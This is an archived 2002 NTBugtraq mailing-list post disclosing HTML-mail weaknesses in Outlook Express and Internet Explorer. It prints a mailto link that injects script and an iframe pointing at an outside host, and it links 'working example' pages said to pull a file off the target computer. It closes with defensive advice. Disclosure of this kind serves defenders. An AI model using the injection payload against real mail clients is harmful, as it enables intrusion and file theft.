More fun with html mail: Outlook Express, Internet Explorer, Other etc

• Previous message: Thor Larholm: "Re: Testing Of Windows 2000 and NT4 IIS .ASP Remote Buffer Overfl ow"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date:         Sun, 14 Apr 2002 21:59:13 -0000
From: "http-equiv@excite.com" <http-equiv@MALWARE.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

Sunday, April 14, 2002

1. Not Possible

Technically it cannot be possible to create an html mail message from
a mailto url scheme without user input. However shoe-horning html in
through insertion of script tags does make it possible. Default
installation of Outlook Express and probably Outlook, is 'mail
sending format: html':

<a href="mailto: freak@bloatedcorp.com
?cc=contest@bloatedcorp.com
&subject=Million Dollar Contest
&body=<script></script>
<iframe src=http://www.malware.com'>">
 contest@bloatedcorp.com </a>

This is not a good idea.

Working Example:

http://www.malware.com/$illine$$.html

Note: this is an 8th month
old 'thing':http://www.securityfocus.com/bid/3334

2. EVEN WORSE:

Trivial file theft using Outlook Express, maybe Outlook. Instead of
delivering files to the target computer, we rather take files from
the target computer. With a bit of Idiot Engineering, we reverse the
process as detailed here: http://www.securityfocus.com/bid/1221 and
here: http://www.kb.cert.org/vuls/id/31994.

Note: now almost 24 months old.

Working Example:

This will pluck and send your Autoexec.bat from a default Windows
installation. Targeted computers with specific files can prove more
lucrative.

http://www.malware.com/idiot$.html

Notes:

1. Outlook Express 6 default mail is in the 'restricted zone'.
Outlook Express 5.5 isn't. Disable Active X and all those other
things.

2. Do not send 'unknown' webmasters entire web pages despite how
tempting the request is.

3. Scraping the bottom of the barrel.

End Call.

--
http://www.malware.com

• Previous message: Thor Larholm: "Re: Testing Of Windows 2000 and NT4 IIS .ASP Remote Buffer Overfl ow"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages Re: Outlook 2003 HTML Mailing ... If they have Office 2003, but can't use Word 2003 as their email editor, ... something may be seriously wrong with their installation. ... Sue Mosher, Outlook MVP ... > I have written an application for our marketing department to take an HTML ... (microsoft.public.outlook.program_vba) Re: [ADVERT] Electrodeless Gold Plating solution ... be true newsgroup gurus utilizing state-of-the-art newsgroup technology. ... after searching all of the drop-down menus in Outlook ... The program I'm using, and perhaps others, is Forte inc's Agent news and mail ... By avoding the use of HTML coding to fancy up the ... (rec.crafts.jewelry) Re: How to integrate company logo with auto send using vb.net ... Mail Message Using> Microsoft Office Outlook (HTML) ... Create an Outlook template file from the HTML message by clicking ... you will see that the src property of the IMG tag for the company logo ... (microsoft.public.outlook.program_vba) Re: How to integrate company logo with auto send using vb.net ... The email that came thru did not have the logo as designed. ... Mail Message Using> Microsoft Office Outlook (HTML) ... Put your cursor in the body of the stationery message, ... (microsoft.public.outlook.program_vba) Re: How to integrate company logo with auto send using vb.net ... The email that came thru did not have the logo as designed. ... Mail Message Using> Microsoft Office Outlook (HTML) ... Put your cursor in the body of the stationery message, ... (microsoft.public.outlook.program_vba)

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint